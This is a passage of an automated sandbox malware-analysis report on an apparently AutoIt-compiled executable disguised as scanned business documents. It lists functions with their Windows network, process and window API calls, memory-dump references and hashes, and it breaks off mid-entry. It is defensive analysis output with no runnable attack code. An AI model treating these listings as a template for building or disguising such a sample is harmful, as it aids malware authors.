                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      • Opcode ID: a56e0b4a7e5206f78b28047b38804ec3157dc169b439c0f074bdfe4c2255f924
                                                      • Instruction ID: ee8223246584d176ebb26f6f2cc8a0c79d73ddbc70e64f175ceab151036085b7
                                                      • Opcode Fuzzy Hash: a56e0b4a7e5206f78b28047b38804ec3157dc169b439c0f074bdfe4c2255f924
                                                      • Instruction Fuzzy Hash: 9841BD31A112099FCB05EFA9C8958BFBBB9FF59320F158069E905A7291E730DD81CF90
                                                      Function 002FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002FD130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002FD13A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: c30ac637c7547972e72f86222f99fc95c72a385e78cd6c18475068ff7988efef
                                                      • Instruction ID: 1d4cef1476d76304d328bb914214cde67e29a5a038cd12f85eda57c2f3271137
                                                      • Opcode Fuzzy Hash: c30ac637c7547972e72f86222f99fc95c72a385e78cd6c18475068ff7988efef
                                                      • Instruction Fuzzy Hash: BD312A75D11109ABCF15EFA4CC85EEEBFBAFF05340F000029E919A61A1DB31A926DF50
                                                      Function 0031356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00313621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0031365C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: d55a9adc962e4f1b90fc70773d758130971f07d0451135321dd0615487a5242b
                                                      • Instruction ID: f1fa2a2a33d3f793b33d57c3f2df64ca5c1251abd068caf1af1cc1b620e58bb1
                                                      • Opcode Fuzzy Hash: d55a9adc962e4f1b90fc70773d758130971f07d0451135321dd0615487a5242b
                                                      • Instruction Fuzzy Hash: 4F31BE71110204AEDB159F28DC80EFB73A9FF8C720F119619F8A597290DB34AD91CB60
                                                      Function 00314537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0031461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00314634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 77fc33f8787844aa0efa39e4cb64cfc1aeb840e0be0f15e4932c9b1b6071d77b
                                                      • Instruction ID: c871729a3e7c0d9d43d23382ad606d595cf65f851f6a48a584472792b10b4679
                                                      • Opcode Fuzzy Hash: 77fc33f8787844aa0efa39e4cb64cfc1aeb840e0be0f15e4932c9b1b6071d77b
                                                      • Instruction Fuzzy Hash: 0C311A74A013099FDF19CF69C990BDABBBAFF49304F15406AE905AB351D770A941CF90
                                                      Function 003131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0031327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00313287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: e47df7f49d2a50ac836dfad623f3ac88b18758abc0a8f90aaa35ddfc7e18423e
                                                      • Instruction ID: 047ced56df808dd2ed132bca3e831e96269d134760cbe1678ab61bf875e236e2
                                                      • Opcode Fuzzy Hash: e47df7f49d2a50ac836dfad623f3ac88b18758abc0a8f90aaa35ddfc7e18423e
                                                      • Instruction Fuzzy Hash: 3011B2713002087FEF2AAF54DC84EFB77AEEB9C364F114524F9189B290D6319D928760
                                                      Function 00313710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0028600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                        • Part of subcall function 0028600E: GetStockObject.GDI32(00000011), ref: 00286060
                                                        • Part of subcall function 0028600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 0031377A
                                                      • GetSysColor.USER32(00000012), ref: 00313794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: dead35ad07398590d8300ef3dfdf8e1500d69b93915846d891fed53e310c18ec
                                                      • Instruction ID: 2659386cace724f2c36f5309082aa47f2dd1c194528257ae56b35522ebc7d0b3
                                                      • Opcode Fuzzy Hash: dead35ad07398590d8300ef3dfdf8e1500d69b93915846d891fed53e310c18ec
                                                      • Instruction Fuzzy Hash: 8F113AB2610209AFDF06DFA8CC45EEA7BB8FB0C314F015514F955E2250D735E8519B50
                                                      Function 002FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002FCD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002FCDA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 633ef8fe0d984347bcf0ee4f3859c3e3b7b54fbea5849e943a135e996719c0e0
                                                      • Instruction ID: fc258a7ae294e2fb8a925f6c5cf3c46a0dc9fdcbc61b4d1d00e5ffd3e3ee6b92
                                                      • Opcode Fuzzy Hash: 633ef8fe0d984347bcf0ee4f3859c3e3b7b54fbea5849e943a135e996719c0e0
                                                      • Instruction Fuzzy Hash: 9211A37126563EBAD7244E668D45EFBFEACEF127E4F204236B24982180D6B09851D6F0
                                                      Function 00313429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 003134AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003134BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 3a6e21c72a2944bf8ef9d7ee5a6ee88a0f21fa02ebe29ba026ac4a094fc3cf79
                                                      • Instruction ID: f87ecb415935dc766bb67a965f90eda3375f0806f822c9f37f53a1fcc4729a87
                                                      • Opcode Fuzzy Hash: 3a6e21c72a2944bf8ef9d7ee5a6ee88a0f21fa02ebe29ba026ac4a094fc3cf79
                                                      • Instruction Fuzzy Hash: 8011BC71100208AFEB278E65DC44AFB37AEEB19374F514324FA61931E0CB31DC919B60
                                                      Function 002E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 002E6CB6
                                                      • _wcslen.LIBCMT ref: 002E6CC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: db3ad284b867e36e2b77a1457d811f1d60fc1e0f834ace0ddf97efa47fefd384
                                                      • Instruction ID: 322f435fb7909a32be8987f726bdec00d3e718c57e1c4eb4d3e6657df9e3dd24
                                                      • Opcode Fuzzy Hash: db3ad284b867e36e2b77a1457d811f1d60fc1e0f834ace0ddf97efa47fefd384
                                                      • Instruction Fuzzy Hash: 410108326705678BCB11AFFECC488BF73A5FA757507900525E45296191EA31D860C750
                                                      Function 002E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 002E3CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 002E1C46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: f4f7172fbcbf94631f3e1d3add453d56af221d734e669a67d9d14e9f0da2e19d
                                                      • Instruction ID: b93d50d4f63f562282d0550c2cc30281880347a81d1a3b87c65b578afa78d670
                                                      • Opcode Fuzzy Hash: f4f7172fbcbf94631f3e1d3add453d56af221d734e669a67d9d14e9f0da2e19d
                                                      • Instruction Fuzzy Hash: 30012475AE11056BCB04FB90C9119FF73A89B15340F64102AE402B72C2EA219A388BB2
                                                      Function 002E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 002E3CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 002E1CC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 8b7b724c2268a47a9a5f4b62373217065c08bce2b550e6371771e037f93c5929
                                                      • Instruction ID: 25aed700b8461e8228dba8fb44430251532b1866315a296659eb57329aac2801
                                                      • Opcode Fuzzy Hash: 8b7b724c2268a47a9a5f4b62373217065c08bce2b550e6371771e037f93c5929
                                                      • Instruction Fuzzy Hash: 9001A775AE115567CB05FB91CA05AFE73A89B16340F641026B802B72C1EA719F78CB72
                                                      Function 0029A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0029A529
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer_wcslen
                                                      • String ID: ,%5$3y-
                                                      • API String ID: 2551934079-428790415
                                                      • Opcode ID: b9c39d7c3107791ed441747dae6cbccb29e7fbb2f8776dd7460168a0d8bb625d
                                                      • Instruction ID: cb7c0461820da10ede5fbd4c08252def9699957101cd955370ce04b916778d4e
                                                      • Opcode Fuzzy Hash: b9c39d7c3107791ed441747dae6cbccb29e7fbb2f8776dd7460168a0d8bb625d
                                                      • Instruction Fuzzy Hash: 8F014232B203108BCA05F768984BBAE73288B07711F800428F906171C2EE509D618EC7
                                                      Function 00318172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00353018,0035305C), ref: 003181BF
                                                      • CloseHandle.KERNEL32 ref: 003181D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: \05
                                                      • API String ID: 3712363035-320011286
                                                      • Opcode ID: a7639fcd0f0fdee4f63c3ba939c3a572c982db02bf54415912020a3699701cd8
                                                      • Instruction ID: 4807b4a30dbcd96d832ce82f2e0b69c1225c3d749b9596ddff81b1b9fea3bcb7
                                                      • Opcode Fuzzy Hash: a7639fcd0f0fdee4f63c3ba939c3a572c982db02bf54415912020a3699701cd8
                                                      • Instruction Fuzzy Hash: B0F05EF5650300BBE6226765AC45FB73A5CDB09792F004460BB09D61F2D6798A1486B8
                                                      Function 0030747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      • API String ID: 176396367-3042988571
                                                      • Opcode ID: ec304130ab9baa3d8f9a2e71a4fd484af41915e6af96f7920de9fb9f437440f4
                                                      • Instruction ID: e6c6747bb59d38b2e2af6cff173c57e40b64affbc187d44042231457ff01ef73
                                                      • Opcode Fuzzy Hash: ec304130ab9baa3d8f9a2e71a4fd484af41915e6af96f7920de9fb9f437440f4
                                                      • Instruction Fuzzy Hash: 0FE02B06A1626111D232267B9CD597F968DCFC6750710182BF981C22A6EFD4DDB193A0
                                                      Function 002E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002E0B23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: 490f8fbf4384bb45d3ffeea9a0340987a58e487a109ba584abb08855508c3f2e
                                                      • Instruction ID: 9b8d4368a3a2eec6e7910c5423efd49316d9c19550514e569f3a62969a0c1707
                                                      • Opcode Fuzzy Hash: 490f8fbf4384bb45d3ffeea9a0340987a58e487a109ba584abb08855508c3f2e
                                                      • Instruction Fuzzy Hash: 53E0D8312E43082BD25536947D43FC97A848F0AF10F10042AF788994C38BD164B04AE9
                                                      Function 002A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0029F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002A0D71,?,?,?,0028100A), ref: 0029F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0028100A), ref: 002A0D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0028100A), ref: 002A0D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002A0D7F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: 694775288eb4e997a84c2bd75ad9528063bddc7fabc190605a9e2f8fdfa4b6aa
                                                      • Instruction ID: d990cc0acbb537bf03c067d4501503ef954e63116967982181e0fd89df954f7d
                                                      • Opcode Fuzzy Hash: 694775288eb4e997a84c2bd75ad9528063bddc7fabc190605a9e2f8fdfa4b6aa
                                                      • Instruction Fuzzy Hash: 62E06D78610B018FE7619FB8D4487927BE4EB09740F008D2DE486C6665DBB4E4988BA1
                                                      Function 0029E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0029E3D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: 0%5$8%5
                                                      • API String ID: 1385522511-2965848538
                                                      • Opcode ID: ddf42806a33a08e46e0710d9e8269fd26c18e132771191121f837db2b372094d
                                                      • Instruction ID: 20571d83e335fe4fffe0b0da62fb8992b144df35b1157ca8a547828224f471b8
